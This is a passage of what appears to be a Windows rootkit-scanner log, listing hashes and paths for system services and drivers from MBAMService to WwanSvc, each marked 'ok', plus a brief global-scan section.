20:02:55.0899 0x0b14  [ 83C982A395D00BAFF6515FB38424EA76, 0E1B66F84A483D47550347D4A9426B95A066DB5104C4284F606A16768A11DB0C ] MBAMService     C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
20:02:55.0961 0x0b14  MBAMService - ok
20:02:56.0024 0x0b14  [ 85CFE7AB85B43B6B7AC7961AA3983A9F, 4E88B75818FD00C0ABBDF8E02EBFB550A67B46E5E13D3B3DF52611793F7DA0DD ] MBAMWebAccessControl C:\WINDOWS\system32\drivers\mwac.sys
20:02:56.0024 0x0b14  MBAMWebAccessControl - ok
20:02:56.0070 0x0b14  [ EB5C03A070F30D64A6DF80E53B22F53F, 12051B6AEBDEE1E28F24364F25A52BA3A6E282ECF86D6290E34BD38E6D4E066D ] megasas         C:\WINDOWS\system32\drivers\megasas.sys
20:02:56.0086 0x0b14  megasas - ok
20:02:56.0149 0x0b14  [ F6F13533196DE7A582D422B0241E4363, B3CD9B08937AFFF12141B38634AF3A56F5AC5FF3EF03941802B9841DEC559469 ] megasr          C:\WINDOWS\system32\drivers\megasr.sys
20:02:56.0195 0x0b14  megasr - ok
20:02:56.0242 0x0b14  [ 4C5179DB61B9E14BEC15CDC4B152B2E9, 9048BEC7AD6A3F4B640E99B1F0365AC9A46740B188758FBB2C160EF30AD6E64B ] MMCSS           C:\WINDOWS\system32\mmcss.dll
20:02:56.0258 0x0b14  MMCSS - ok
20:02:56.0289 0x0b14  [ 8B38C44F69259987C95135C9627E2378, E698B82D4EFFF56D66C7FC9866369BA5736FDBDBE2028CC421C51E70DEA74727 ] Modem           C:\WINDOWS\system32\drivers\modem.sys
20:02:56.0305 0x0b14  Modem - ok
20:02:56.0352 0x0b14  [ 601589000CC90F0DF8DA2CC254A3CCC9, D1238A386C41B6C368D9A44B7C112C943995B5403E2A5B4B7346B266DDB0C5A0 ] monitor         C:\WINDOWS\System32\drivers\monitor.sys
20:02:56.0352 0x0b14  monitor - ok
20:02:56.0367 0x0b14  [ 08374E4E5B8914DE6067CBA99F61E930, CBB1390D6523FC968BEDF78FD13699488621ACB2CD1DF55D1606316090548661 ] mouclass        C:\WINDOWS\System32\drivers\mouclass.sys
20:02:56.0383 0x0b14  mouclass - ok
20:02:56.0430 0x0b14  [ 5FCBAB60598AE119E02B4C27DE6B99EA, 36F30094F700DE41C293047ACB49ED1961DD927BEDAD8DFDAB7023D4D24CB0DE ] mouhid          C:\WINDOWS\System32\drivers\mouhid.sys
20:02:56.0430 0x0b14  mouhid - ok
20:02:56.0492 0x0b14  [ D1D82F007A079A4D623DBD1F36EF30A1, 7901F81B62C5A4196D75A10C05386B16831CB290EFB9A1611CECF281068C520F ] mountmgr        C:\WINDOWS\system32\drivers\mountmgr.sys
20:02:56.0492 0x0b14  mountmgr - ok
20:03:12.0615 0x0b14  udfs - ok
20:03:12.0630 0x0b14  [ 9578691F297E1B1F519970FE6D47CB21, 080C352AAF22A16A4F3C4AB4DCEA5BFA656457C73F735CEBA30516FDACCF6301 ] UEFI            C:\WINDOWS\System32\drivers\UEFI.sys
20:03:12.0646 0x0b14  UEFI - ok
20:03:12.0709 0x0b14  [ A867F0F978EE64C87FADC3B100869EE4, 2686BE85F963D0D0BB275E92E5B543280D8742CF10772303E3189D0719B6A277 ] UI0Detect       C:\WINDOWS\system32\UI0Detect.exe
20:03:12.0724 0x0b14  UI0Detect - ok
20:03:12.0771 0x0b14  [ 5EAB5117DDB24FC4D39E6FFFCF1837B9, 2BC709240867F161E94BE6625A04F478EAAA3EEE7BC7C37ED0DFA9EEA5928E98 ] uliagpkx        C:\WINDOWS\system32\drivers\uliagpkx.sys
20:03:12.0787 0x0b14  uliagpkx - ok
20:03:12.0833 0x0b14  [ DA34C39A18E60E7C3FA0630566408034, 2F162504214053894C72760D9933D01DBF3578609FE5E2376C3272818599FE32 ] umbus           C:\WINDOWS\System32\drivers\umbus.sys
20:03:12.0849 0x0b14  umbus - ok
20:03:12.0865 0x0b14  [ AE8294875E5446E359B1E8035D40C05E, AE0357BAB47C07C3576BC76951CD258C009BC5A1B93259D2122A841BD9CDA8FA ] UmPass          C:\WINDOWS\System32\drivers\umpass.sys
20:03:12.0880 0x0b14  UmPass - ok
20:03:12.0943 0x0b14  [ A023F267A262D5DA6CE1436D9C5E8FD9, 92AD7AF91184C244A7E392F49663143193A80D5D81114546A00F18227DE31D23 ] UmRdpService    C:\WINDOWS\System32\umrdp.dll
20:03:12.0990 0x0b14  UmRdpService - ok
20:03:13.0052 0x0b14  [ C98493DD8E6A50154FAC75C15E1C36BB, CECD1C826C8F7AF05468871BF6A0ACDBB6B0202F4F87F48C6D367E5BD699E800 ] upnphost        C:\WINDOWS\System32\upnphost.dll
20:03:13.0083 0x0b14  upnphost - ok
20:03:13.0130 0x0b14  [ FF78D053A05E5A394F4E3C1816CC65A8, 5DAE02414271231F5FDBB751AFEB99874779B467947020815D4AE54432D4269D ] usbccgp         C:\WINDOWS\System32\drivers\usbccgp.sys
20:03:13.0162 0x0b14  usbccgp - ok
20:03:13.0240 0x0b14  [ 0139248F6B95CF0D837B5B46A2722D40, 38E3E704E0364F07732DB418AEBD126B040FB3CDB7D78EA36E8605D50D528A80 ] usbcir          C:\WINDOWS\System32\drivers\usbcir.sys
20:03:13.0255 0x0b14  usbcir - ok
20:03:13.0318 0x0b14  [ 48BA326A3DBA5B5BEB5F2777F4618696, B9EC8155F11A3A7644BD9DC8910681B46AE44AE3BF53F052DF50E9C5555E3229 ] usbehci         C:\WINDOWS\System32\drivers\usbehci.sys
20:03:13.0349 0x0b14  usbehci - ok
20:03:13.0380 0x0b14  [ 4875DC63E548812C75D4FDEF84970C89, 6A29306BAB6F95F0384E16533A9588A654A6E3CFC35D55A4CEB2B14EF34EEE19 ] usbfilter       C:\WINDOWS\system32\DRIVERS\usbfilter.sys
20:03:13.0396 0x0b14  usbfilter - ok
20:03:13.0521 0x0b14  [ FEF0BC107812B36849741C3211BA6B60, B3EF738BE1E6B6027F29C9713CD3F367EA067D2BE46580AFBC0FB58046EF6BBD ] usbhub          C:\WINDOWS\System32\drivers\usbhub.sys
20:03:13.0568 0x0b14  usbhub - ok
20:03:13.0709 0x0b14  [ 95B0179BDA907252025DEEA183699FB3, A6BDFB93EE9418A83407024204A41640A08638C60E2BE75C249D102601DC1D80 ] USBHUB3         C:\WINDOWS\System32\drivers\UsbHub3.sys
20:03:13.0741 0x0b14  USBHUB3 - ok
20:03:13.0803 0x0b14  [ 3019097FB6C985EF24C058090FF3BDBD, 24AC518D34E338D94BF3D5B3F72E53F8A1369BAA7F32FEA3EDBCF928C4FF1D17 ] usbohci         C:\WINDOWS\System32\drivers\usbohci.sys
20:03:13.0819 0x0b14  usbohci - ok
20:03:13.0881 0x0b14  [ 4D655E3B684BE9B0F7FFD8A2935C348C, 3A7FC1748C5AEA8CFE0E7C22ADC77E3DCA475455FC16D9C6A5C16EB5E949A516 ] usbprint        C:\WINDOWS\System32\drivers\usbprint.sys
20:03:13.0897 0x0b14  usbprint - ok
20:03:13.0959 0x0b14  [ 66732C13628BDB1AB0D6FD46027327C2, B582C0F348D8F79419CA5A58F10CA151E06D7CA3BE162344CADA46D9D7FED97C ] USBSTOR         C:\WINDOWS\System32\drivers\USBSTOR.SYS
20:03:13.0991 0x0b14  USBSTOR - ok
20:03:14.0022 0x0b14  [ 064260B3A5868AC894A4943543BC7AB7, D3534E98B34C4AC9A430D7E0AB301A0E5E1511E3117C2FEA392636B0DE2C38E2 ] usbuhci         C:\WINDOWS\System32\drivers\usbuhci.sys
20:03:14.0053 0x0b14  usbuhci - ok
20:03:14.0147 0x0b14  [ 5C8F604F6DC74177CDD8372D7B1ADFF0, C1DE9A37A7A01CCCBFCE13C1E5B26683F620AB21EDA5A14C82022E2F49C84484 ] usbvideo        C:\WINDOWS\System32\Drivers\usbvideo.sys
20:03:14.0178 0x0b14  usbvideo - ok
20:03:14.0303 0x0b14  [ 44603DA5A87FB491EF59C889EBBB4DDB, 59AA9B6B0B5D66F9312CD3F999D0D9F12F1A2C5D230365AD7287CD71FD86961C ] USBXHCI         C:\WINDOWS\System32\drivers\USBXHCI.SYS
20:03:14.0334 0x0b14  USBXHCI - ok
20:03:14.0381 0x0b14  [ 382100E75B6F4668AEAEF228C6CEFFAD, 9C7229F10F11D18E1FED6395391A46225A84B421034B9AB6F81AF7430FDC556F ] VaultSvc        C:\WINDOWS\system32\lsass.exe
20:03:14.0381 0x0b14  VaultSvc - ok
20:03:14.0428 0x0b14  [ FEB26E3B8345A7E8D62F945C4AE86562, 3AAFE87C402FC8E92542DFE60EC9540559863065F88D429A16D7B1BF829223FF ] vdrvroot        C:\WINDOWS\system32\drivers\vdrvroot.sys
20:03:14.0428 0x0b14  vdrvroot - ok
20:03:14.0569 0x0b14  [ 8A4D808D1EC7C1C47B2C8BF488A9A07A, 63C07312ADB6F8A8BDE93361C30AC63DAB4DE1141AF54630EEF11E54B0BF983D ] vds             C:\WINDOWS\System32\vds.exe
20:03:14.0663 0x0b14  vds - ok
20:03:14.0678 0x0b14  [ A026EDEAA5EECAE0B08E2748B616D4BD, 2525A54DC7F49DDFBB999C22BF3FAB6D9E9F70C0806E58D81E90AC59F9F46089 ] VerifierExt     C:\WINDOWS\system32\drivers\VerifierExt.sys
20:03:14.0710 0x0b14  VerifierExt - ok
20:03:14.0913 0x0b14  [ C06E8481E068F170A258441639AC5792, 2F550530BACB511A195D5047F003B01CB6E04FA9A0DCCF638CB3D51FF5467DC7 ] vhdmp           C:\WINDOWS\System32\drivers\vhdmp.sys
20:03:15.0116 0x0b14  vhdmp - ok
20:03:15.0147 0x0b14  [ 06D38968028E9AB19DE9B618C7B6D199, 62022297A47F440D1C82CA0B0E57C0C8E9D5033D83DD3B40492B218DF65EBF68 ] viaide          C:\WINDOWS\system32\drivers\viaide.sys
20:03:15.0163 0x0b14  viaide - ok
20:03:15.0210 0x0b14  [ 511AD3FF957A0127E6BD336FF6F89C38, 55325BFD0857A1204F7F6F8ED8C91C07B0E20A50402105708E7365ECD9E25A21 ] vmbus           C:\WINDOWS\system32\drivers\vmbus.sys
20:03:15.0241 0x0b14  vmbus - ok
20:03:15.0256 0x0b14  [ DA40BEA0A863CE768C940CA9723BF81F, 567C0C3F422325635808B0CF76E05D3B6187F96845C33F85F92F98C9FE53A5B8 ] VMBusHID        C:\WINDOWS\System32\drivers\VMBusHID.sys
20:03:15.0272 0x0b14  VMBusHID - ok
20:03:15.0350 0x0b14  [ C42C38E15C0DC39D4B0BDF34F733E468, 7264680C44FA68BB1FC0A490FE3988AFDE19892295F7458943D8CBEE6C01D4F0 ] vmicguestinterface C:\WINDOWS\System32\ICSvc.dll
20:03:15.0397 0x0b14  vmicguestinterface - ok
20:03:15.0444 0x0b14  [ C42C38E15C0DC39D4B0BDF34F733E468, 7264680C44FA68BB1FC0A490FE3988AFDE19892295F7458943D8CBEE6C01D4F0 ] vmicheartbeat   C:\WINDOWS\System32\ICSvc.dll
20:03:15.0475 0x0b14  vmicheartbeat - ok
20:03:15.0506 0x0b14  [ C42C38E15C0DC39D4B0BDF34F733E468, 7264680C44FA68BB1FC0A490FE3988AFDE19892295F7458943D8CBEE6C01D4F0 ] vmickvpexchange C:\WINDOWS\System32\ICSvc.dll
20:03:15.0538 0x0b14  vmickvpexchange - ok
20:03:15.0585 0x0b14  [ C42C38E15C0DC39D4B0BDF34F733E468, 7264680C44FA68BB1FC0A490FE3988AFDE19892295F7458943D8CBEE6C01D4F0 ] vmicrdv         C:\WINDOWS\System32\ICSvc.dll
20:03:15.0616 0x0b14  vmicrdv - ok
20:03:15.0647 0x0b14  [ C42C38E15C0DC39D4B0BDF34F733E468, 7264680C44FA68BB1FC0A490FE3988AFDE19892295F7458943D8CBEE6C01D4F0 ] vmicshutdown    C:\WINDOWS\System32\ICSvc.dll
20:03:15.0681 0x0b14  vmicshutdown - ok
20:03:15.0727 0x0b14  [ C42C38E15C0DC39D4B0BDF34F733E468, 7264680C44FA68BB1FC0A490FE3988AFDE19892295F7458943D8CBEE6C01D4F0 ] vmictimesync    C:\WINDOWS\System32\ICSvc.dll
20:03:15.0759 0x0b14  vmictimesync - ok
20:03:15.0790 0x0b14  [ C42C38E15C0DC39D4B0BDF34F733E468, 7264680C44FA68BB1FC0A490FE3988AFDE19892295F7458943D8CBEE6C01D4F0 ] vmicvss         C:\WINDOWS\System32\ICSvc.dll
20:03:15.0821 0x0b14  vmicvss - ok
20:03:15.0884 0x0b14  [ 55D7D963DE85162F1C49721E502F9744, 5AD34D6DB707EF3E5242BD8CA67B21D6258EE7E7FC477D5227BD15500AE7F45F ] volmgr          C:\WINDOWS\system32\drivers\volmgr.sys
20:03:15.0899 0x0b14  volmgr - ok
20:03:15.0931 0x0b14  [ CCB9E901F7254BF96D28EB1B0E5329B7, F0E3CA4EFA544CDAEF4092284CF3EC7DF07F806A770285E281816457AD8813F5 ] volmgrx         C:\WINDOWS\system32\drivers\volmgrx.sys
20:03:15.0946 0x0b14  volmgrx - ok
20:03:16.0009 0x0b14  [ 64CA2B4A49A8EAF495E435623ECCE7DB, 81151F295A54DE2B8B88C7F48C86BF58CDFF96F98493509C06D6F41484594386 ] volsnap         C:\WINDOWS\system32\drivers\volsnap.sys
20:03:16.0040 0x0b14  volsnap - ok
20:03:16.0087 0x0b14  [ EF31713EE4C7CCFE4049F7E7F15645A2, 35D198D3F1061E19A7EF89FA1E75377049CD6BCA9702F8076B9F95BB8737E0D4 ] vpci            C:\WINDOWS\System32\drivers\vpci.sys
20:03:16.0102 0x0b14  vpci - ok
20:03:16.0165 0x0b14  [ 4539F45F9F4C9757A86A56C949421E07, DEC362314B2C66414F39354AFE79C02B18BF4EEF90787FB58307F6EB62237E2C ] vsmraid         C:\WINDOWS\system32\drivers\vsmraid.sys
20:03:16.0196 0x0b14  vsmraid - ok
20:03:16.0321 0x0b14  [ 94FAFD473CDD80CE19A21FB9503D7ED1, 953E5E8C753C0017E1258695A76F60CC05D283F7476B9D9C5C8AC78B8E3FCE18 ] VSS             C:\WINDOWS\system32\vssvc.exe
20:03:16.0399 0x0b14  VSS - ok
20:03:16.0478 0x0b14  [ 0849B7260F26FE05EA56DED0672E2F4B, 7EAC0E7988F45CB4133A15932955B7B03CE715C967A3BAC9999D81543EBCAEC5 ] VSTXRAID        C:\WINDOWS\system32\drivers\vstxraid.sys
20:03:16.0524 0x0b14  VSTXRAID - ok
20:03:16.0571 0x0b14  [ BE970C369E43B509C1EDA2B8FA7CECB0, 18951F2AA842A0795AA79A4E164EE925A35E6270EBE4C4CDB19D0A891830E383 ] vwifibus        C:\WINDOWS\System32\drivers\vwifibus.sys
20:03:16.0587 0x0b14  vwifibus - ok
20:03:16.0618 0x0b14  [ 6B26AD573CCDD5209DF4397438B76354, 2C8AC314EC471F6D8B0B12D49D621360A10DCADA7C52E73596730C954FF89FCF ] vwififlt        C:\WINDOWS\system32\DRIVERS\vwififlt.sys
20:03:16.0634 0x0b14  vwififlt - ok
20:03:16.0665 0x0b14  [ 0B48E0DFB44EE475F4FD8A8EE599AF30, 28271D4CA0C642304CD8826A3D514F44E3391F9D6D07A1595BB30CE65E7E3494 ] vwifimp         C:\WINDOWS\system32\DRIVERS\vwifimp.sys
20:03:16.0681 0x0b14  vwifimp - ok
20:03:16.0743 0x0b14  [ DC821E811EFBB65CDD77FBB8B6ECA385, B7C8AACDF81DBA298F2F384983D36B269876C31F0398D89BF9070217A069B96F ] W32Time         C:\WINDOWS\system32\w32time.dll
20:03:16.0774 0x0b14  W32Time - ok
20:03:16.0884 0x0b14  [ 8E553C859C83784DEC08B10AFC3EAC92, 41D8DBA1500DBD3AC9783169ACF545805EF05069F12866238992A30794369254 ] w3logsvc        C:\WINDOWS\system32\inetsrv\w3logsvc.dll
20:03:16.0931 0x0b14  w3logsvc - ok
20:03:16.0978 0x0b14  [ 0910AB9ED404C1434E2D0376C2AD5D8B, 62585CA5F1375BDA440D28D5DF1ADDC9DE3DDFA196D49BBFF3456A5A09EE1C6B ] WacomPen        C:\WINDOWS\System32\drivers\wacompen.sys
20:03:17.0009 0x0b14  WacomPen - ok
20:03:17.0087 0x0b14  [ 9BAE40BD31E3EE0B0C70BEF167E0A2BC, 2419AC815C95F2629E1832973501983D06F788728755605D42D6C8565C3CBBF1 ] WAS             C:\WINDOWS\system32\inetsrv\iisw3adm.dll
20:03:17.0134 0x0b14  WAS - ok
20:03:17.0290 0x0b14  [ A81988DCC4FA440AA88B84CA452F5E22, 3573AAA09971E8ADB6FEFA778E02B2D8EE5E4249267CF37A524D9F019CC836FB ] wbengine        C:\WINDOWS\system32\wbengine.exe
20:03:17.0431 0x0b14  wbengine - ok
20:03:17.0524 0x0b14  [ 0F1DFA2FED73FA78B8C3CDE332A870F6, 1089F6F585F5350D349A640EBD3117832DF6B3657EB6667CB00AE217E04ACA17 ] WbioSrvc        C:\WINDOWS\System32\wbiosrvc.dll
20:03:17.0556 0x0b14  WbioSrvc - ok
20:03:17.0587 0x0b14  [ 0EAEC313B24837613621B4A2536ED382, 61C194ED7FA7D65BBE61A546D5FCA52F52AB08324E084D3EC23C9706E9BF0175 ] Wcmsvc          C:\WINDOWS\System32\wcmsvc.dll
20:03:17.0618 0x0b14  Wcmsvc - ok
20:03:17.0682 0x0b14  [ F6B4C2280FF7C7156AC8A4687B9DA35E, 1899D584D7469BB49355D84080051E2575B033E6312009D9C6C1DD3F7F9AA4C5 ] wcncsvc         C:\WINDOWS\System32\wcncsvc.dll
20:03:17.0730 0x0b14  wcncsvc - ok
20:03:17.0762 0x0b14  [ B7BF1D783F5B2484E8CE1C0C78257F16, 468601199FCCF63DBAE86EE6B8825EA85B2A1EE177413353FFA2CC9CA5249FCD ] WcsPlugInService C:\WINDOWS\System32\WcsPlugInService.dll
20:03:17.0793 0x0b14  WcsPlugInService - ok
20:03:17.0840 0x0b14  [ 1751F6B031ADAC34724511057D2E455D, BCBC77DE02718868302F7469E8FBB8F2E7E0F8A5D3E46A5B4D48713E829FBAF6 ] WdBoot          C:\WINDOWS\system32\drivers\WdBoot.sys
20:03:17.0840 0x0b14  WdBoot - ok
20:03:17.0949 0x0b14  [ CB6C63FF8342B467E2EF76E98D5B934D, BE017CE91E3BAB293DE6ECF143797CCE3F33CC63024437472B4E38C6961AD884 ] Wdf01000        C:\WINDOWS\system32\drivers\Wdf01000.sys
20:03:17.0996 0x0b14  Wdf01000 - ok
20:03:18.0059 0x0b14  [ D296D0F0DB2CD1504F90405603664493, 9531034AE2E027B5C7366713AA9003085501800B35F971D1CE7FFB8E5DAE3825 ] WdFilter        C:\WINDOWS\system32\drivers\WdFilter.sys
20:03:18.0074 0x0b14  WdFilter - ok
20:03:18.0137 0x0b14  [ F581F9C9D6953FABFA24E67105F0B614, 5A7BB72523D1C53BBE68700537D7AE0D150BC7E4B8227A916B2E29EE4CA267A9 ] WdiServiceHost  C:\WINDOWS\system32\wdi.dll
20:03:18.0137 0x0b14  WdiServiceHost - ok
20:03:18.0152 0x0b14  [ F581F9C9D6953FABFA24E67105F0B614, 5A7BB72523D1C53BBE68700537D7AE0D150BC7E4B8227A916B2E29EE4CA267A9 ] WdiSystemHost   C:\WINDOWS\system32\wdi.dll
20:03:18.0168 0x0b14  WdiSystemHost - ok
20:03:18.0199 0x0b14  [ 9F4DF0043965808973023A9B51A11136, 3A799125CBC5C214D9FBB91C348B39563B1FDB7403B520270752E9A177464723 ] WdNisDrv        C:\WINDOWS\system32\Drivers\WdNisDrv.sys
20:03:18.0215 0x0b14  WdNisDrv - ok
20:03:18.0277 0x0b14  WdNisSvc - ok
20:03:18.0324 0x0b14  [ 185E4111627F7AA6799E1366B5E91D65, 7A02C816DFBCCF47EDB49E5E2005A3D0B80719FAC94F9298D2DBAC63950EDA05 ] WebClient       C:\WINDOWS\System32\webclnt.dll
20:03:18.0371 0x0b14  WebClient - ok
20:03:18.0418 0x0b14  [ 384E1D04FE20845B2559D292F17A9FA1, AD3B0B2B2219691AC30FEEC8AFDB3BBB74B51BB7D02038AE2B4DEA514E245315 ] Wecsvc          C:\WINDOWS\system32\wecsvc.dll
20:03:18.0465 0x0b14  Wecsvc - ok
20:03:18.0512 0x0b14  [ 455014F4E48B67EBE0F032E2B0E06BF2, A36435784A034B27056A0E606683A20C69F1B0AB2B6BAEDEAEAA190F6287CAEF ] WEPHOSTSVC      C:\WINDOWS\system32\wephostsvc.dll
20:03:18.0543 0x0b14  WEPHOSTSVC - ok
20:03:18.0574 0x0b14  [ F13DBA57CEA9B7074B95EDCA6AD2635E, 1D9BA4841EF1343A5D9096B5FE27FC65DC1901D6683DD13516171638549666B5 ] wercplsupport   C:\WINDOWS\System32\wercplsupport.dll
20:03:18.0590 0x0b14  wercplsupport - ok
20:03:18.0621 0x0b14  [ FD7E58B6AA3EABF2D12B9762A20E11E4, 4C5E2E246C5C70074866BB3DBC2AAF483ECE4345004CCB8D1FE285047268685D ] WerSvc          C:\WINDOWS\System32\WerSvc.dll
20:03:18.0637 0x0b14  WerSvc - ok
20:03:18.0668 0x0b14  [ BAB713B409258DB7B5D9F9693F802B0E, C0D0391EC4FDC07E0A07F4EEB2DC9CC5B2BE5D2E292E7D01929E8D39D6F73EA5 ] WFPLWFS         C:\WINDOWS\system32\DRIVERS\wfplwfs.sys
20:03:18.0684 0x0b14  WFPLWFS - ok
20:03:18.0731 0x0b14  [ 8C840E1FD7584E74BD0CC1EA581EC187, 148E534A94B4882E7396B13FABE17407802292E7890713540080D03D5629C81D ] WiaRpc          C:\WINDOWS\System32\wiarpc.dll
20:03:18.0762 0x0b14  WiaRpc - ok
20:03:18.0793 0x0b14  [ 5F66B7BB330AA80067FC66149A692620, 92C5D7115A168A23108B65EEEB5FBA8FA43D781855355792596D2419160263C2 ] WIMMount        C:\WINDOWS\system32\drivers\wimmount.sys
20:03:18.0809 0x0b14  WIMMount - ok
20:03:18.0824 0x0b14  WinDefend - ok
20:03:18.0949 0x0b14  [ 10DAD6A7FC617A221313BD584E3C3A00, F139B878668ECF38FE59831E8595A207D5CEEE76C6FFDA8C9F735435E601A763 ] WinHttpAutoProxySvc C:\WINDOWS\system32\winhttp.dll
20:03:18.0996 0x0b14  WinHttpAutoProxySvc - ok
20:03:19.0106 0x0b14  [ FC8BD690321216C32BB58B035B6D5674, D61698DB19D9DB2593B60B6BA13F7B7735667206F41D751D507135469D6D3CDD ] Winmgmt         C:\WINDOWS\system32\wbem\WMIsvc.dll
20:03:19.0137 0x0b14  Winmgmt - ok
20:03:19.0340 0x0b14  [ 75436315AA383CF527695C6D49D0CA59, E3D55F2ACBD45D4D031FA6CA799394459C89BE50FF6ADE4FE36F2CAB2D2E63D0 ] WinRM           C:\WINDOWS\system32\WsmSvc.dll
20:03:19.0606 0x0b14  WinRM - ok
20:03:19.0683 0x0b14  [ 4F2A80D65AE6F845776E2F06AE6782ED, 2455537C048115435D9EDE4B18F9F54C43912076AEF36BDEFEC35AF2140B8B2E ] WirelessButtonDriver C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys
20:03:19.0714 0x0b14  WirelessButtonDriver - ok
20:03:19.0855 0x0b14  [ DC079BA8390089E4EBCA63D27EEA3ECB, 4D549217A68292E2B16C09FD9F84317011EE54A2DAF4E2AB85554267DF0D3249 ] WlanSvc         C:\WINDOWS\System32\wlansvc.dll
20:03:19.0949 0x0b14  WlanSvc - ok
20:03:20.0058 0x0b14  [ 06BF5897949A8F24893F792E876B71F5, 9D3719492A86BF52A56E2EA798FD6FDB5862A03F6D360FCC4B0CEA9BE9792AE4 ] wlidsvc         C:\WINDOWS\system32\wlidsvc.dll
20:03:20.0183 0x0b14  wlidsvc - ok
20:03:20.0230 0x0b14  [ 2834D9D3B4F554A39C72F00EA3F0E128, D10124343C67FE9A0B711AD569BB8080495FCEA0ECEF9AC3F3FBD6865F436A44 ] WmiAcpi         C:\WINDOWS\System32\drivers\wmiacpi.sys
20:03:20.0230 0x0b14  WmiAcpi - ok
20:03:20.0292 0x0b14  [ B96F7A1236C3F21212DE2C40A3DDB005, 5A29EBB6DA036E303611EB1304192655021405BB05452FD37886DDE604FF0D9D ] wmiApSrv        C:\WINDOWS\system32\wbem\WmiApSrv.exe
20:03:20.0308 0x0b14  wmiApSrv - ok
20:03:20.0340 0x0b14  WMPNetworkSvc - ok
20:03:20.0402 0x0b14  [ 7FC5667DF73D4B04AA457CC3A4180E09, CB7B014945DCA16B6D120DBE0E5876C4C867A4ACD3C3536AEADC14B908613D4E ] Wof             C:\WINDOWS\system32\drivers\Wof.sys
20:03:20.0418 0x0b14  Wof - ok
20:03:20.0589 0x0b14  [ 588040D595BBF0856CA1ADD941A8ED17, CBC92BB5453FE1BEA6F33239B7CE884F312559591383408EA5F95A006156C5D3 ] workfolderssvc  C:\WINDOWS\system32\workfolderssvc.dll
20:03:20.0714 0x0b14  workfolderssvc - ok
20:03:20.0777 0x0b14  [ A2468CC3509394A33C4C32F99563D845, 62690C7D41F382DF74B8F4B942647842858E37DE35FF2DE028192E4D09ABB2C5 ] wpcfltr         C:\WINDOWS\system32\DRIVERS\wpcfltr.sys
20:03:20.0808 0x0b14  wpcfltr - ok
20:03:20.0855 0x0b14  [ 19F4DF69876DA7E9C4965351560FE6B7, 127247A7964F55EE3AF842D25120F5ACD387632BEE2BF3D28FAC05840CEA19BA ] WPCSvc          C:\WINDOWS\System32\wpcsvc.dll
20:03:20.0933 0x0b14  WPCSvc - ok
20:03:20.0964 0x0b14  [ 2ADE11F3D84709C5F6781E4C59F11683, F003C43396CF8FCF44EAB87583650DB4D2A233322D28D6A78D1694945D9073BB ] WPDBusEnum      C:\WINDOWS\system32\wpdbusenum.dll
20:03:20.0980 0x0b14  WPDBusEnum - ok
20:03:21.0043 0x0b14  [ 9F2904B55F6CECCD1A8D986B5CE2609A, E19ED4DD3CEF3A22C058FC324824604FB3FC98A029C94E6C2A3389F938D680B6 ] WpdUpFltr       C:\WINDOWS\system32\drivers\WpdUpFltr.sys
20:03:21.0089 0x0b14  WpdUpFltr - ok
20:03:21.0136 0x0b14  [ AE072B0339D0A18E455DC21666CAD572, AB1DAEA25E2C7AD610818D4B4783F6D4190D85EBB3963BBAD410E8CEA7899EDB ] ws2ifsl         C:\WINDOWS\system32\drivers\ws2ifsl.sys
20:03:21.0183 0x0b14  ws2ifsl - ok
20:03:21.0230 0x0b14  [ 5596C0960ED6ED7494BF2A55DE428684, C95CF09A657F37F421CC80E16F2F95B8EC59A8D5D48F104551155EAC8E53DCB2 ] wscsvc          C:\WINDOWS\System32\wscsvc.dll
20:03:21.0230 0x0b14  wscsvc - ok
20:03:21.0246 0x0b14  WSearch - ok
20:03:21.0667 0x0b14  [ 6B2D71124C1EA86B74412F414C42431D, 078CC6C9667EF6BDA3E6900BC26A5A5B030CAA66928A6BBB7B7DC43C5C199EDC ] WSService       C:\WINDOWS\System32\WSService.dll
20:03:21.0903 0x0b14  WSService - ok
20:03:22.0294 0x0b14  [ 50CEC061C6D6FD2B9C89BECD08991CCB, 31EB1601426223E712C4E4AA29410EDFC81E020996A402BD3E850A2EAF127286 ] wuauserv        C:\WINDOWS\system32\wuaueng.dll
20:03:22.0559 0x0b14  wuauserv - ok
20:03:22.0700 0x0b14  [ 481286719402E4BAEFEA0604AB1B5113, F3CF65DF2AB39F79AE4C1335831408418E40726706E0242677E8B96B0FAD988F ] WudfPf          C:\WINDOWS\system32\drivers\WudfPf.sys
20:03:22.0716 0x0b14  WudfPf - ok
20:03:22.0747 0x0b14  [ D7B4859227B02BCC1055B279A63C937F, 82C99844CC596C2723523B1B98573488FF23337947B78AA04BA21E58394BB751 ] WUDFRd          C:\WINDOWS\System32\drivers\WUDFRd.sys
20:03:22.0762 0x0b14  WUDFRd - ok
20:03:22.0794 0x0b14  [ D7B4859227B02BCC1055B279A63C937F, 82C99844CC596C2723523B1B98573488FF23337947B78AA04BA21E58394BB751 ] WUDFSensorLP    C:\WINDOWS\system32\DRIVERS\WUDFRd.sys
20:03:22.0809 0x0b14  WUDFSensorLP - ok
20:03:22.0856 0x0b14  [ 51D28F7F1F888DDCF2C67DCF3B79A5D3, 74FF2936AFCEB9A36175D5B00EB91A5AD614B52BE3FB3FA9B994A025A484D2B7 ] wudfsvc         C:\WINDOWS\System32\WUDFSvc.dll
20:03:22.0872 0x0b14  wudfsvc - ok
20:03:22.0966 0x0b14  [ A0900F8F628B5AF6841414EB3CF11E50, 8A531F2472FF4B4D895D469D28C215C834ECADBEF539894B8F3F606079A86184 ] WwanSvc         C:\WINDOWS\System32\wwansvc.dll
20:03:23.0044 0x0b14  WwanSvc - ok
20:03:23.0091 0x0b14  ================ Scan global ===============================
20:03:23.0231 0x0b14  [ 243F54DBA6EB48A369CA465E263ABA4A, 9D9F9DE783D000F3EA130EB68FD71319F21E4F1CD4232FB8B2F8A9A67E08F5F4 ] C:\WINDOWS\system32\basesrv.dll
20:03:23.0294 0x0b14  [ EAB311B0A7A8EA0346F14F08D4BC8F46, 11168E4074679F8A69DA714C0ABD0C68BA49D171B379343F14783C9C563202CA ] C:\WINDOWS\system32\winsrv.dll
20:03:23.0388 0x0b14  [ 3600ED7EA8AED849E20700551C0BD63B, 4A8C346C1646E80B58EF93F87F915A41E05CA2E993BB1C96955AE62A0669AF66 ] C:\WINDOWS\system32\sxssrv.dll
20:03:23.0497 0x0b14  [ E0C7813A97CA7947FF5C18A8F3B61A45, 083BB4F3B20419C87DB656F1465E5F782ACDE76838CDE6207F26AAD035C69DE0 ] C:\WINDOWS\system32\services.exe
20:03:23.0528 0x0b14  [ Global ] - ok
20:03:23.0528 0x0b14  ================ Scan MBR ==================================
